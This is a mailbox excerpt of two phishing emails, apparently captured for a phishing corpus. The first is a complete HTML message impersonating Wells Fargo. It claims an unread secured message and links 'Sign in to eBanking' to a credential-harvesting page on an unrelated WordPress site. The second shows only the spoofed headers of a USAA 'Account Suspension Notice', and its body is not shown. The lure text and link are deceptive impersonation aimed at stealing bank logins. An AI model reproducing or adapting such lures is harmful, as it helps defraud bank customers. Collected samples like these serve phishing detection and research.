From: Wells Fargo <onlinebanking@alerts.wellsfargo.com>
Reply-To: onlinebanking@alerts.wellsfargo.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id: <E1Z1vjt-000600-Ia@server.akbar-it.co.id>
Date: Mon, 08 Jun 2015 12:01:13 +0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.akbar-it.co.id
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [507 518] / [47 12]
X-AntiAbuse: Sender Address Domain - server.akbar-it.co.id
X-Get-Message-Sender-Via: server.akbar-it.co.id: authenticated_id: kurniacahyagroup/only user confirmed/virtual account not confirmed
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 101

<title>Wells Fargo Bank: You have (1) Unread Secured Message !</title>
<p align="left"><img alt="http://www.nhc.org/media/images/wells-fargo-logo.jpg" src="http://www.nhc.org/media/images/wells-fargo-logo.jpg" width="341" height="123" /></p>
<p align="left"><font face="Tahoma" size="3">Dear Valued Customer,</font></p>
<p align="left"><font size="3">You've got a new message</font></p>
<p><font size="3">Thank you for banking online with Wells Fargo</font></p>
<p><font size="4"><a href="http://ninekl.com/wp-admin/webmaster/wellsfargo.com.htm"><strong>Sign in to eBanking</strong></a></font></p>
<p align="left"><font face="Tahoma" size="3">Thank you for helping us to protect you.</font></p>
<p><font face="Tahoma" size="3">Security Advisor</font><font color="black" face="Tahoma" size="3"><br>
</font><font face="Tahoma" size="2">Wells Fargo</font><font color="black" face="Tahoma" size="2"> 
Bank </font><font color="#000000" face="Tahoma" size="2">Security Team</font></p>


From service0@usaa.com  Thu Jun 11 12:45:04 2015
Return-Path: <service0@usaa.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id 4C9F7F4132
	for <jose@login.monkey.org>; Thu, 11 Jun 2015 12:45:04 -0500 (CDT)
Received: from smtpin11.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay02.b.hostedemail.com (Postfix) with SMTP id 129D327AC51
	for <jose@login.monkey.org>; Thu, 11 Jun 2015 17:45:04 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70287839328.11.point84_6661b86ce8263
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,0,0,0ebdb72a146b1a46,d41d8cd98f00b204,service0@usaa.com,:service0@usaa.com,RULES_HIT:41:72:379:421:474:962:967:969:973:978:983:988:989:1189:1208:1221:1254:1260:1261:1263:1313:1314:1336:1381:1394:1395:1431:1432:1436:1437:1516:1517:1518:1534:1541:1575:1588:1592:1594:1711:1714:1730:1777:1792:2145:2194:2199:2525:2553:2560:2563:2682:2685:2693:2741:2859:2890:2896:2900:2901:2907:2915:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3350:3865:3866:3867:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4362:5007:6261:6684:6687:6688:6750:8599:8957:9025:9059:9388:9411:9416:9873:9908:10004:10214:10346:10400:11529:11658:11914:12043:12050:12051:12438:12561:12776:13038:13110:13139:13161:13227:13229:13235:13236:13237:13628:14037:14096:21080,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0
X-HE-Tag: point84_6661b86ce8263
X-Filterd-Recvd-Size: 2926
Received: from smtp-auth-1.cc.uic.edu (smtp-auth-1.cc.uic.edu [128.248.156.173])
	by imf12.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 11 Jun 2015 17:45:03 +0000 (UTC)
Received: from smtpout-2.cc.uic.edu (smtpout-2.data.cc.uic.edu [192.168.100.233])
	by smtp-auth-1.cc.uic.edu (Postfix) with SMTP id 813B68C7FB
	for <jose@monkey.org>; Thu, 11 Jun 2015 12:39:29 -0500 (CDT)
Received: (qmail 31554 invoked from network); 11 Jun 2015 12:22:04 -0500
Received: from onal.respcare.uic.edu (HELO E?nal-PC.comclient.uic.edu) (128.248.29.186)
  by smtpout-2.cc.uic.edu with SMTP; 11 Jun 2015 12:22:04 -0500
Content-Type: multipart/alternative; boundary="===============1084640541=="
MIME-Version: 1.0
Subject: USAA: Account Suspension Notice
To: Recipients <service0@usaa.com>
